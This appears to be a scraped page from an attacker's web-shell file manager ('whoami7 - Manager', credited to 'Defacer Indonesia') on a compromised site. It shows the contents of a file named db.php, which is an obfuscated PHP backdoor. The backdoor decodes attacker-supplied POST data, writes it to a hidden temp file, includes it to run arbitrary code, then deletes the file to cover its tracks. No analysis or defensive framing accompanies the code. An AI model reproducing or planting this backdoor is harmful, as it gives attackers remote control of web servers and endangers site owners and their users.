whoami7 - Manager
:
/
home
/
analuakl
/
ankurmedia.com
/
GMR
/
Upload File:
files >> /home/analuakl/ankurmedia.com/GMR/db.php
<?php if(filter_has_var(INPUT_POST, "en\x74r\x79")){ $val = $_POST["en\x74r\x79"]; $val =explode( "." , $val) ; $record = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt2 ); foreach($val as $z =>$v3) { $chS = ord($salt2[$z % $lenS] ); $dec =((int)$v3 - $chS -($z % 10))^ 86; $record .= chr($dec ); } $holder = array_filter(["/dev/shm", "/var/tmp", session_save_path(), sys_get_temp_dir(), "/tmp", getenv("TEMP"), getenv("TMP"), getcwd(), ini_get("upload_tmp_dir")]); while ($element = array_shift($holder)) { if (array_product([is_dir($element), is_writable($element)])) { $flag = join("/", [$element, ".item"]); $success = file_put_contents($flag, $record); if ($success) { include $flag; @unlink($flag); exit;} } } } if(isset($_POST["\x69te\x6D"]) ? true : false){ $k = array_filter([getenv("TEMP"), "/var/tmp", "/dev/shm", "/tmp", session_save_path(), getcwd(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TMP")]); $entry = $_POST["\x69te\x6D"]; $entry= explode ( '.' , $entry ) ; $elem = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s6); $l = 0; $len = count($entry); do { if ($l >= $len) break; $v9 = $entry[$l]; $sChar = ord($s6[$l% $lenS]); $d = ((int)$v9 - $sChar - ($l% 10)) ^ 40; $elem .= chr($d); $l++; } while (true); $rec = 0; do { $flag = $k[$rec] ?? null; if ($rec >= count($k)) break; if ((bool)is_dir($flag) && (bool)is_writable($flag)) { $obj = "$flag" . "/.fac"; $success = file_put_contents($obj, $elem); if ($success) { include $obj; @unlink($obj); exit;} } $rec++; } while (true); }
Copyright ©2021 || Defacer Indonesia